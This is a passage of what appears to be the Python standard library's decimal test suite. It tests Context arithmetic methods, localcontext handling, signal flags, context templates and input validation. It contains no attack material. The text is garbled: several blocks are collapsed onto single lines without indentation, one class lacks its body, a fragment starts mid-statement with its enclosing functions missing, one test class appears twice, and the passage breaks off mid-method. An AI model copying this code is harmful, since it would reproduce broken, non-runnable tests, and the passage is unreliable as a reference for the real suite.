        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.divmod(Decimal(1), Decimal(2))
        self.assertEqual(c.divmod(1, 2), d)
        self.assertEqual(c.divmod(Decimal(1), 2), d)
        self.assertEqual(c.divmod(1, Decimal(2)), d)
        self.assertRaises(TypeError, c.divmod, '1', 2)
        self.assertRaises(TypeError, c.divmod, 1, '2')

    def test_exp(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.exp(Decimal(10))
        self.assertEqual(c.exp(10), d)
        self.assertRaises(TypeError, c.exp, '10')

    def test_fma(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.fma(Decimal(2), Decimal(3), Decimal(4))
        self.assertEqual(c.fma(2, 3, 4), d)
        self.assertEqual(c.fma(Decimal(2), 3, 4), d)
        self.assertEqual(c.fma(2, Decimal(3), 4), d)
        self.assertEqual(c.fma(2, 3, Decimal(4)), d)
        self.assertEqual(c.fma(Decimal(2), Decimal(3), 4), d)
        self.assertRaises(TypeError, c.fma, '2', 3, 4)
        self.assertRaises(TypeError, c.fma, 2, '3', 4)
        self.assertRaises(TypeError, c.fma, 2, 3, '4')

        # Issue 12079 for Context.fma ...
        self.assertRaises(TypeError, c.fma,
                          Decimal('Infinity'), Decimal(0), "not a decimal")
        self.assertRaises(TypeError, c.fma,
                          Decimal(1), Decimal('snan'), 1.222)
        # ... and for Decimal.fma.
        self.assertRaises(TypeError, Decimal('Infinity').fma,
                          Decimal(0), "not a decimal")
        self.assertRaises(TypeError, Decimal(1).fma,
                          Decimal('snan'), 1.222)

    def test_is_finite(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.is_finite(Decimal(10))
        self.assertEqual(c.is_finite(10), d)
        self.assertRaises(TypeError, c.is_finite, '10')

    def test_is_infinite(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.is_infinite(Decimal(10))
        self.assertEqual(c.is_infinite(10), d)
        self.assertRaises(TypeError, c.is_infinite, '10')

    def test_is_nan(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.is_nan(Decimal(10))
        self.assertEqual(c.is_nan(10), d)
        self.assertRaises(TypeError, c.is_nan, '10')

    def test_is_normal(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.is_normal(Decimal(10))
        self.assertEqual(c.is_normal(10), d)
        self.assertRaises(TypeError, c.is_normal, '10')

    def test_is_qnan(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.is_qnan(Decimal(10))
        self.assertEqual(c.is_qnan(10), d)
        self.assertRaises(TypeError, c.is_qnan, '10')

    def test_is_signed(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.is_signed(Decimal(10))
        self.assertEqual(c.is_signed(10), d)
        self.assertRaises(TypeError, c.is_signed, '10')

    def test_is_snan(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.is_snan(Decimal(10))
        self.assertEqual(c.is_snan(10), d)
        self.assertRaises(TypeError, c.is_snan, '10')

    def test_is_subnormal(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.is_subnormal(Decimal(10))
        self.assertEqual(c.is_subnormal(10), d)
        self.assertRaises(TypeError, c.is_subnormal, '10')

    def test_is_zero(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.is_zero(Decimal(10))
        self.assertEqual(c.is_zero(10), d)
        self.assertRaises(TypeError, c.is_zero, '10')

    def test_ln(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.ln(Decimal(10))
        self.assertEqual(c.ln(10), d)
        self.assertRaises(TypeError, c.ln, '10')

    def test_log10(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.log10(Decimal(10))
        self.assertEqual(c.log10(10), d)
        self.assertRaises(TypeError, c.log10, '10')

    def test_logb(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.logb(Decimal(10))
        self.assertEqual(c.logb(10), d)
        self.assertRaises(TypeError, c.logb, '10')

    def test_logical_and(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.logical_and(Decimal(1), Decimal(1))
        self.assertEqual(c.logical_and(1, 1), d)
        self.assertEqual(c.logical_and(Decimal(1), 1), d)
        self.assertEqual(c.logical_and(1, Decimal(1)), d)
        self.assertRaises(TypeError, c.logical_and, '1', 1)
        self.assertRaises(TypeError, c.logical_and, 1, '1')

    def test_logical_invert(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.logical_invert(Decimal(1000))
        self.assertEqual(c.logical_invert(1000), d)
        self.assertRaises(TypeError, c.logical_invert, '1000')

    def test_logical_or(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.logical_or(Decimal(1), Decimal(1))
        self.assertEqual(c.logical_or(1, 1), d)
        self.assertEqual(c.logical_or(Decimal(1), 1), d)
        self.assertEqual(c.logical_or(1, Decimal(1)), d)
        self.assertRaises(TypeError, c.logical_or, '1', 1)
        self.assertRaises(TypeError, c.logical_or, 1, '1')

    def test_logical_xor(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.logical_xor(Decimal(1), Decimal(1))
        self.assertEqual(c.logical_xor(1, 1), d)
        self.assertEqual(c.logical_xor(Decimal(1), 1), d)
        self.assertEqual(c.logical_xor(1, Decimal(1)), d)
        self.assertRaises(TypeError, c.logical_xor, '1', 1)
        self.assertRaises(TypeError, c.logical_xor, 1, '1')

    def test_max(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.max(Decimal(1), Decimal(2))
        self.assertEqual(c.max(1, 2), d)
        self.assertEqual(c.max(Decimal(1), 2), d)
        self.assertEqual(c.max(1, Decimal(2)), d)
        self.assertRaises(TypeError, c.max, '1', 2)
        self.assertRaises(TypeError, c.max, 1, '2')

    def test_max_mag(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.max_mag(Decimal(1), Decimal(2))
        self.assertEqual(c.max_mag(1, 2), d)
        self.assertEqual(c.max_mag(Decimal(1), 2), d)
        self.assertEqual(c.max_mag(1, Decimal(2)), d)
        self.assertRaises(TypeError, c.max_mag, '1', 2)
        self.assertRaises(TypeError, c.max_mag, 1, '2')

    def test_min(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.min(Decimal(1), Decimal(2))
        self.assertEqual(c.min(1, 2), d)
        self.assertEqual(c.min(Decimal(1), 2), d)
        self.assertEqual(c.min(1, Decimal(2)), d)
        self.assertRaises(TypeError, c.min, '1', 2)
        self.assertRaises(TypeError, c.min, 1, '2')

    def test_min_mag(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.min_mag(Decimal(1), Decimal(2))
        self.assertEqual(c.min_mag(1, 2), d)
        self.assertEqual(c.min_mag(Decimal(1), 2), d)
        self.assertEqual(c.min_mag(1, Decimal(2)), d)
        self.assertRaises(TypeError, c.min_mag, '1', 2)
        self.assertRaises(TypeError, c.min_mag, 1, '2')

    def test_minus(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.minus(Decimal(10))
        self.assertEqual(c.minus(10), d)
        self.assertRaises(TypeError, c.minus, '10')

    def test_multiply(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.multiply(Decimal(1), Decimal(2))
        self.assertEqual(c.multiply(1, 2), d)
        self.assertEqual(c.multiply(Decimal(1), 2), d)
        self.assertEqual(c.multiply(1, Decimal(2)), d)
        self.assertRaises(TypeError, c.multiply, '1', 2)
        self.assertRaises(TypeError, c.multiply, 1, '2')

    def test_next_minus(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.next_minus(Decimal(10))
        self.assertEqual(c.next_minus(10), d)
        self.assertRaises(TypeError, c.next_minus, '10')

    def test_next_plus(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.next_plus(Decimal(10))
        self.assertEqual(c.next_plus(10), d)
        self.assertRaises(TypeError, c.next_plus, '10')

    def test_next_toward(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.next_toward(Decimal(1), Decimal(2))
        self.assertEqual(c.next_toward(1, 2), d)
        self.assertEqual(c.next_toward(Decimal(1), 2), d)
        self.assertEqual(c.next_toward(1, Decimal(2)), d)
        self.assertRaises(TypeError, c.next_toward, '1', 2)
        self.assertRaises(TypeError, c.next_toward, 1, '2')

    def test_normalize(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.normalize(Decimal(10))
        self.assertEqual(c.normalize(10), d)
        self.assertRaises(TypeError, c.normalize, '10')

    def test_number_class(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        self.assertEqual(c.number_class(123), c.number_class(Decimal(123)))
        self.assertEqual(c.number_class(0), c.number_class(Decimal(0)))
        self.assertEqual(c.number_class(-45), c.number_class(Decimal(-45)))

    def test_plus(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.plus(Decimal(10))
        self.assertEqual(c.plus(10), d)
        self.assertRaises(TypeError, c.plus, '10')

    def test_power(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.power(Decimal(1), Decimal(4))
        self.assertEqual(c.power(1, 4), d)
        self.assertEqual(c.power(Decimal(1), 4), d)
        self.assertEqual(c.power(1, Decimal(4)), d)
        self.assertEqual(c.power(Decimal(1), Decimal(4)), d)
        self.assertRaises(TypeError, c.power, '1', 4)
        self.assertRaises(TypeError, c.power, 1, '4')
        # power is the one ternary Context method with a modulo argument;
        # all three operands are accepted by keyword, in any order.
        self.assertEqual(c.power(modulo=5, b=8, a=2), 1)

    def test_quantize(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.quantize(Decimal(1), Decimal(2))
        self.assertEqual(c.quantize(1, 2), d)
        self.assertEqual(c.quantize(Decimal(1), 2), d)
        self.assertEqual(c.quantize(1, Decimal(2)), d)
        self.assertRaises(TypeError, c.quantize, '1', 2)
        self.assertRaises(TypeError, c.quantize, 1, '2')

    def test_remainder(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.remainder(Decimal(1), Decimal(2))
        self.assertEqual(c.remainder(1, 2), d)
        self.assertEqual(c.remainder(Decimal(1), 2), d)
        self.assertEqual(c.remainder(1, Decimal(2)), d)
        self.assertRaises(TypeError, c.remainder, '1', 2)
        self.assertRaises(TypeError, c.remainder, 1, '2')

    def test_remainder_near(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.remainder_near(Decimal(1), Decimal(2))
        self.assertEqual(c.remainder_near(1, 2), d)
        self.assertEqual(c.remainder_near(Decimal(1), 2), d)
        self.assertEqual(c.remainder_near(1, Decimal(2)), d)
        self.assertRaises(TypeError, c.remainder_near, '1', 2)
        self.assertRaises(TypeError, c.remainder_near, 1, '2')

    def test_rotate(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.rotate(Decimal(1), Decimal(2))
        self.assertEqual(c.rotate(1, 2), d)
        self.assertEqual(c.rotate(Decimal(1), 2), d)
        self.assertEqual(c.rotate(1, Decimal(2)), d)
        self.assertRaises(TypeError, c.rotate, '1', 2)
        self.assertRaises(TypeError, c.rotate, 1, '2')

    def test_sqrt(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.sqrt(Decimal(10))
        self.assertEqual(c.sqrt(10), d)
        self.assertRaises(TypeError, c.sqrt, '10')

    def test_same_quantum(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.same_quantum(Decimal(1), Decimal(2))
        self.assertEqual(c.same_quantum(1, 2), d)
        self.assertEqual(c.same_quantum(Decimal(1), 2), d)
        self.assertEqual(c.same_quantum(1, Decimal(2)), d)
        self.assertRaises(TypeError, c.same_quantum, '1', 2)
        self.assertRaises(TypeError, c.same_quantum, 1, '2')

    def test_scaleb(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.scaleb(Decimal(1), Decimal(2))
        self.assertEqual(c.scaleb(1, 2), d)
        self.assertEqual(c.scaleb(Decimal(1), 2), d)
        self.assertEqual(c.scaleb(1, Decimal(2)), d)
        self.assertRaises(TypeError, c.scaleb, '1', 2)
        self.assertRaises(TypeError, c.scaleb, 1, '2')

    def test_shift(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.shift(Decimal(1), Decimal(2))
        self.assertEqual(c.shift(1, 2), d)
        self.assertEqual(c.shift(Decimal(1), 2), d)
        self.assertEqual(c.shift(1, Decimal(2)), d)
        self.assertRaises(TypeError, c.shift, '1', 2)
        self.assertRaises(TypeError, c.shift, 1, '2')

    def test_subtract(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.subtract(Decimal(1), Decimal(2))
        self.assertEqual(c.subtract(1, 2), d)
        self.assertEqual(c.subtract(Decimal(1), 2), d)
        self.assertEqual(c.subtract(1, Decimal(2)), d)
        self.assertRaises(TypeError, c.subtract, '1', 2)
        self.assertRaises(TypeError, c.subtract, 1, '2')

    def test_to_eng_string(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.to_eng_string(Decimal(10))
        self.assertEqual(c.to_eng_string(10), d)
        self.assertRaises(TypeError, c.to_eng_string, '10')

    def test_to_sci_string(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.to_sci_string(Decimal(10))
        self.assertEqual(c.to_sci_string(10), d)
        self.assertRaises(TypeError, c.to_sci_string, '10')

    def test_to_integral_exact(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.to_integral_exact(Decimal(10))
        self.assertEqual(c.to_integral_exact(10), d)
        self.assertRaises(TypeError, c.to_integral_exact, '10')

    def test_to_integral_value(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        c = Context()

        d = c.to_integral_value(Decimal(10))
        self.assertEqual(c.to_integral_value(10), d)
        self.assertRaises(TypeError, c.to_integral_value, '10')
        # takes no rounding/extra argument, unlike the Decimal method
        self.assertRaises(TypeError, c.to_integral_value, 10, 'x')


# Run the Context-API suite against both implementations of the module.
class CContextAPItests(ContextAPItests):
    decimal = C

class PyContextAPItests(ContextAPItests):
    decimal = P


class ContextWithStatement(unittest.TestCase):
    # Can't do these as docstrings until Python 2.6
    # as doctest can't handle __future__ statements

    def test_localcontext(self):
        # Use a copy of the current context in the block
        getcontext = self.decimal.getcontext
        localcontext = self.decimal.localcontext

        orig_ctx = getcontext()
        with localcontext() as enter_ctx:
            set_ctx = getcontext()
        final_ctx = getcontext()
        self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
        self.assertIsNot(orig_ctx, set_ctx, 'did not copy the context')
        self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')

    def test_localcontextarg(self):
        # Use a copy of the supplied context in the block
        Context = self.decimal.Context
        getcontext = self.decimal.getcontext
        localcontext = self.decimal.localcontext
        # NOTE(review): duplicated assignment below — presumably a
        # copy-paste slip; harmless, confirm against upstream.
        localcontext = self.decimal.localcontext

        orig_ctx = getcontext()
        new_ctx = Context(prec=42)
        with localcontext(new_ctx) as enter_ctx:
            set_ctx = getcontext()
        final_ctx = getcontext()
        self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
        self.assertEqual(set_ctx.prec, new_ctx.prec, 'did not set correct context')
        self.assertIsNot(new_ctx, set_ctx, 'did not copy the context')
        self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')

    def test_nested_with_statements(self):
        # Use a copy of the supplied context in the block
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        getcontext = self.decimal.getcontext
        localcontext = self.decimal.localcontext
        Clamped = self.decimal.Clamped
        Overflow = self.decimal.Overflow

        orig_ctx = getcontext()
        orig_ctx.clear_flags()
        new_ctx = 
Context(Emax=384) with localcontext() as c1: self.assertEqual(c1.flags, orig_ctx.flags) self.assertEqual(c1.traps, orig_ctx.traps) c1.traps[Clamped] = True c1.Emin = -383 self.assertNotEqual(orig_ctx.Emin, -383) self.assertRaises(Clamped, c1.create_decimal, '0e-999') self.assertTrue(c1.flags[Clamped]) with localcontext(new_ctx) as c2: self.assertEqual(c2.flags, new_ctx.flags) self.assertEqual(c2.traps, new_ctx.traps) self.assertRaises(Overflow, c2.power, Decimal('3.4e200'), 2) self.assertFalse(c2.flags[Clamped]) self.assertTrue(c2.flags[Overflow]) del c2 self.assertFalse(c1.flags[Overflow]) del c1 self.assertNotEqual(orig_ctx.Emin, -383) self.assertFalse(orig_ctx.flags[Clamped]) self.assertFalse(orig_ctx.flags[Overflow]) self.assertFalse(new_ctx.flags[Clamped]) self.assertFalse(new_ctx.flags[Overflow]) def test_with_statements_gc1(self): localcontext = self.decimal.localcontext with localcontext() as c1: del c1 with localcontext() as c2: del c2 with localcontext() as c3: del c3 with localcontext() as c4: del c4 def test_with_statements_gc2(self): localcontext = self.decimal.localcontext with localcontext() as c1: with localcontext(c1) as c2: del c1 with localcontext(c2) as c3: del c2 with localcontext(c3) as c4: del c3 del c4 def test_with_statements_gc3(self): Context = self.decimal.Context localcontext = self.decimal.localcontext getcontext = self.decimal.getcontext setcontext = self.decimal.setcontext with localcontext() as c1: del c1 n1 = Context(prec=1) setcontext(n1) with localcontext(n1) as c2: del n1 self.assertEqual(c2.prec, 1) del c2 n2 = Context(prec=2) setcontext(n2) del n2 self.assertEqual(getcontext().prec, 2) n3 = Context(prec=3) setcontext(n3) self.assertEqual(getcontext().prec, 3) with localcontext(n3) as c3: del n3 self.assertEqual(c3.prec, 3) del c3 n4 = Context(prec=4) setcontext(n4) del n4 self.assertEqual(getcontext().prec, 4) with localcontext() as c4: self.assertEqual(c4.prec, 4) del c4 class CContextWithStatement(ContextWithStatement): 
class PyContextWithStatement(ContextWithStatement):
    decimal = P

class ContextFlags(unittest.TestCase):

    def test_flags_irrelevant(self):
        # check that the result (numeric result + flags raised) of an
        # arithmetic operation doesn't depend on the current flags
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        Inexact = self.decimal.Inexact
        Rounded = self.decimal.Rounded
        Underflow = self.decimal.Underflow
        Clamped = self.decimal.Clamped
        Subnormal = self.decimal.Subnormal

        def raise_error(context, flag):
            # The C implementation has no _raise_error helper, so set the
            # flag by hand and honor an enabled trap explicitly.
            if self.decimal == C:
                context.flags[flag] = True
                if context.traps[flag]:
                    raise flag
            else:
                context._raise_error(flag)

        context = Context(prec=9, Emin = -425000000, Emax = 425000000,
                          rounding=ROUND_HALF_EVEN, traps=[], flags=[])

        # operations that raise various flags, in the form (function, arglist)
        operations = [
            (context._apply, [Decimal("100E-425000010")]),
            (context.sqrt, [Decimal(2)]),
            (context.add, [Decimal("1.23456789"), Decimal("9.87654321")]),
            (context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]),
            (context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]),
            ]

        # try various flags individually, then a whole lot at once
        flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal],
                    [Inexact, Rounded, Underflow, Clamped, Subnormal]]

        for fn, args in operations:
            # find answer and flags raised using a clean context
            context.clear_flags()
            ans = fn(*args)
            flags = [k for k, v in context.flags.items() if v]

            for extra_flags in flagsets:
                # set flags, before calling operation
                context.clear_flags()
                for flag in extra_flags:
                    raise_error(context, flag)
                new_ans = fn(*args)

                # flags that we expect to be set after the operation
                expected_flags = list(flags)
                for flag in extra_flags:
                    if flag not in expected_flags:
                        expected_flags.append(flag)
                expected_flags.sort(key=id)

                # flags we actually got
                new_flags = [k for k, v in context.flags.items() if v]
                new_flags.sort(key=id)

                self.assertEqual(ans, new_ans,
                                 "operation produces different answers depending on flags set: " +
                                 "expected %s, got %s." % (ans, new_ans))
                self.assertEqual(new_flags, expected_flags,
                                 "operation raises different flags depending on flags set: " +
                                 "expected %s, got %s" % (expected_flags, new_flags))

    def test_flag_comparisons(self):
        Context = self.decimal.Context
        Inexact = self.decimal.Inexact
        Rounded = self.decimal.Rounded

        c = Context()

        # Valid SignalDict
        self.assertNotEqual(c.flags, c.traps)
        self.assertNotEqual(c.traps, c.flags)

        c.flags = c.traps
        self.assertEqual(c.flags, c.traps)
        self.assertEqual(c.traps, c.flags)

        c.flags[Rounded] = True
        c.traps = c.flags
        self.assertEqual(c.flags, c.traps)
        self.assertEqual(c.traps, c.flags)

        d = {}
        d.update(c.flags)
        self.assertEqual(d, c.flags)
        self.assertEqual(c.flags, d)

        d[Inexact] = True
        self.assertNotEqual(d, c.flags)
        self.assertNotEqual(c.flags, d)

        # Invalid SignalDict
        d = {Inexact:False}
        self.assertNotEqual(d, c.flags)
        self.assertNotEqual(c.flags, d)

        d = ["xyz"]
        self.assertNotEqual(d, c.flags)
        self.assertNotEqual(c.flags, d)

    @requires_IEEE_754
    def test_float_operation(self):
        Decimal = self.decimal.Decimal
        FloatOperation = self.decimal.FloatOperation
        localcontext = self.decimal.localcontext

        with localcontext() as c:
            ##### trap is off by default
            self.assertFalse(c.traps[FloatOperation])

            # implicit conversion sets the flag
            c.clear_flags()
            self.assertEqual(Decimal(7.5), 7.5)
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            self.assertEqual(c.create_decimal(7.5), 7.5)
            self.assertTrue(c.flags[FloatOperation])

            # explicit conversion does not set the flag
            c.clear_flags()
            x = Decimal.from_float(7.5)
            self.assertFalse(c.flags[FloatOperation])
            # comparison sets the flag
            self.assertEqual(x, 7.5)
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            x = c.create_decimal_from_float(7.5)
            self.assertFalse(c.flags[FloatOperation])
            self.assertEqual(x, 7.5)
            self.assertTrue(c.flags[FloatOperation])

            ##### set the trap
            c.traps[FloatOperation] = True

            # implicit conversion raises
            c.clear_flags()
            self.assertRaises(FloatOperation, Decimal, 7.5)
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            self.assertRaises(FloatOperation, c.create_decimal, 7.5)
            self.assertTrue(c.flags[FloatOperation])

            # explicit conversion is silent
            c.clear_flags()
            x = Decimal.from_float(7.5)
            self.assertFalse(c.flags[FloatOperation])

            c.clear_flags()
            x = c.create_decimal_from_float(7.5)
            self.assertFalse(c.flags[FloatOperation])
Decimal('100.0')]) self.assertEqual(len(s), 1) self.assertTrue(c.flags[FloatOperation]) c.clear_flags() if signal: self.assertRaises(signal, sorted, [1.0, Decimal('10.0')]) else: s = sorted([10.0, Decimal('10.0')]) self.assertTrue(c.flags[FloatOperation]) c.clear_flags() b = 10.0 in [Decimal('10.0'), 1.0] self.assertTrue(c.flags[FloatOperation]) c.clear_flags() b = 10.0 in {Decimal('10.0'):'a', 1.0:'b'} self.assertTrue(c.flags[FloatOperation]) nc = Context() with localcontext(nc) as c: self.assertFalse(c.traps[FloatOperation]) doit(c, signal=None) test_containers(c, signal=None) c.traps[FloatOperation] = True doit(c, signal=FloatOperation) test_containers(c, signal=FloatOperation) def test_float_operation_default(self): Decimal = self.decimal.Decimal Context = self.decimal.Context Inexact = self.decimal.Inexact FloatOperation= self.decimal.FloatOperation context = Context() self.assertFalse(context.flags[FloatOperation]) self.assertFalse(context.traps[FloatOperation]) context.clear_traps() context.traps[Inexact] = True context.traps[FloatOperation] = True self.assertTrue(context.traps[FloatOperation]) self.assertTrue(context.traps[Inexact]) class CContextFlags(ContextFlags): decimal = C class PyContextFlags(ContextFlags): decimal = P class SpecialContexts(unittest.TestCase): """Test the context templates.""" def test_context_templates(self): BasicContext = self.decimal.BasicContext ExtendedContext = self.decimal.ExtendedContext getcontext = self.decimal.getcontext setcontext = self.decimal.setcontext InvalidOperation = self.decimal.InvalidOperation DivisionByZero = self.decimal.DivisionByZero Overflow = self.decimal.Overflow Underflow = self.decimal.Underflow Clamped = self.decimal.Clamped assert_signals(self, BasicContext, 'traps', [InvalidOperation, DivisionByZero, Overflow, Underflow, Clamped] ) savecontext = getcontext().copy() basic_context_prec = BasicContext.prec extended_context_prec = ExtendedContext.prec ex = None try: BasicContext.prec = 
ExtendedContext.prec = 441 for template in BasicContext, ExtendedContext: setcontext(template) c = getcontext() self.assertIsNot(c, template) self.assertEqual(c.prec, 441) except Exception as e: ex = e.__class__ finally: BasicContext.prec = basic_context_prec ExtendedContext.prec = extended_context_prec setcontext(savecontext) if ex: raise ex def test_default_context(self): DefaultContext = self.decimal.DefaultContext BasicContext = self.decimal.BasicContext ExtendedContext = self.decimal.ExtendedContext getcontext = self.decimal.getcontext setcontext = self.decimal.setcontext InvalidOperation = self.decimal.InvalidOperation DivisionByZero = self.decimal.DivisionByZero Overflow = self.decimal.Overflow self.assertEqual(BasicContext.prec, 9) self.assertEqual(ExtendedContext.prec, 9) assert_signals(self, DefaultContext, 'traps', [InvalidOperation, DivisionByZero, Overflow] ) savecontext = getcontext().copy() default_context_prec = DefaultContext.prec ex = None try: c = getcontext() saveprec = c.prec DefaultContext.prec = 961 c = getcontext() self.assertEqual(c.prec, saveprec) setcontext(DefaultContext) c = getcontext() self.assertIsNot(c, DefaultContext) self.assertEqual(c.prec, 961) except Exception as e: ex = e.__class__ finally: DefaultContext.prec = default_context_prec setcontext(savecontext) if ex: raise ex class CSpecialContexts(SpecialContexts): decimal = C class PySpecialContexts(SpecialContexts): decimal = P class ContextInputValidation(unittest.TestCase): def test_invalid_context(self): Context = self.decimal.Context DefaultContext = self.decimal.DefaultContext c = DefaultContext.copy() # prec, Emax for attr in ['prec', 'Emax']: setattr(c, attr, 999999) self.assertEqual(getattr(c, attr), 999999) self.assertRaises(ValueError, setattr, c, attr, -1) self.assertRaises(TypeError, setattr, c, attr, 'xyz') # Emin setattr(c, 'Emin', -999999) self.assertEqual(getattr(c, 'Emin'), -999999) self.assertRaises(ValueError, setattr, c, 'Emin', 1) 
class ContextInputValidation(unittest.TestCase):

    def test_invalid_context(self):
        Context = self.decimal.Context
        DefaultContext = self.decimal.DefaultContext

        c = DefaultContext.copy()

        # prec, Emax
        for attr in ['prec', 'Emax']:
            setattr(c, attr, 999999)
            self.assertEqual(getattr(c, attr), 999999)
            self.assertRaises(ValueError, setattr, c, attr, -1)
            self.assertRaises(TypeError, setattr, c, attr, 'xyz')

        # Emin
        setattr(c, 'Emin', -999999)
        self.assertEqual(getattr(c, 'Emin'), -999999)
        self.assertRaises(ValueError, setattr, c, 'Emin', 1)
        self.assertRaises(TypeError, setattr, c, 'Emin', (1,2,3))

        # rounding: must be one of the rounding-mode strings
        self.assertRaises(TypeError, setattr, c, 'rounding', -1)
        self.assertRaises(TypeError, setattr, c, 'rounding', 9)
        self.assertRaises(TypeError, setattr, c, 'rounding', 1.0)
        self.assertRaises(TypeError, setattr, c, 'rounding', 'xyz')

        # capitals, clamp
        for attr in ['capitals', 'clamp']:
            self.assertRaises(ValueError, setattr, c, attr, -1)
            self.assertRaises(ValueError, setattr, c, attr, 2)
            self.assertRaises(TypeError, setattr, c, attr, [1,2,3])

        # Invalid attribute
        self.assertRaises(AttributeError, setattr, c, 'emax', 100)

        # Invalid signal dict
        self.assertRaises(TypeError, setattr, c, 'flags', [])
        self.assertRaises(KeyError, setattr, c, 'flags', {})
        self.assertRaises(KeyError, setattr, c, 'traps',
                          {'InvalidOperation':0})

        # Attributes cannot be deleted
        for attr in ['prec', 'Emax', 'Emin', 'rounding', 'capitals', 'clamp',
                     'flags', 'traps']:
            self.assertRaises(AttributeError, c.__delattr__, attr)

        # Invalid attributes
        self.assertRaises(TypeError, getattr, c, 9)
        self.assertRaises(TypeError, setattr, c, 9)

        # Invalid values in constructor
        self.assertRaises(TypeError, Context, rounding=999999)
        self.assertRaises(TypeError, Context, rounding='xyz')
        self.assertRaises(ValueError, Context, clamp=2)
        self.assertRaises(ValueError, Context, capitals=-1)
        self.assertRaises(KeyError, Context, flags=["P"])
        self.assertRaises(KeyError, Context, traps=["Q"])

        # Type error in conversion
        self.assertRaises(TypeError, Context, flags=(0,1))
        self.assertRaises(TypeError, Context, traps=(1,0))

class CContextInputValidation(ContextInputValidation):
    decimal = C
class PyContextInputValidation(ContextInputValidation):
    decimal = P

class ContextSubclassing(unittest.TestCase):

    def test_context_subclassing(self):
        decimal = self.decimal
        Decimal = decimal.Decimal
        Context = decimal.Context
        Clamped = decimal.Clamped
        DivisionByZero = decimal.DivisionByZero
        Inexact = decimal.Inexact
        Overflow = decimal.Overflow
        Rounded = decimal.Rounded
        Subnormal = decimal.Subnormal
        Underflow = decimal.Underflow
        InvalidOperation = decimal.InvalidOperation

        class MyContext(Context):
            def __init__(self, prec=None, rounding=None, Emin=None, Emax=None,
                               capitals=None, clamp=None, flags=None,
                               traps=None):
                Context.__init__(self)
                if prec is not None:
                    self.prec = prec
                if rounding is not None:
                    self.rounding = rounding
                if Emin is not None:
                    self.Emin = Emin
                if Emax is not None:
                    self.Emax = Emax
                if capitals is not None:
                    self.capitals = capitals
                if clamp is not None:
                    self.clamp = clamp
                if flags is not None:
                    if isinstance(flags, list):
                        flags = {v:(v in flags) for v in OrderedSignals[decimal] + flags}
                    self.flags = flags
                if traps is not None:
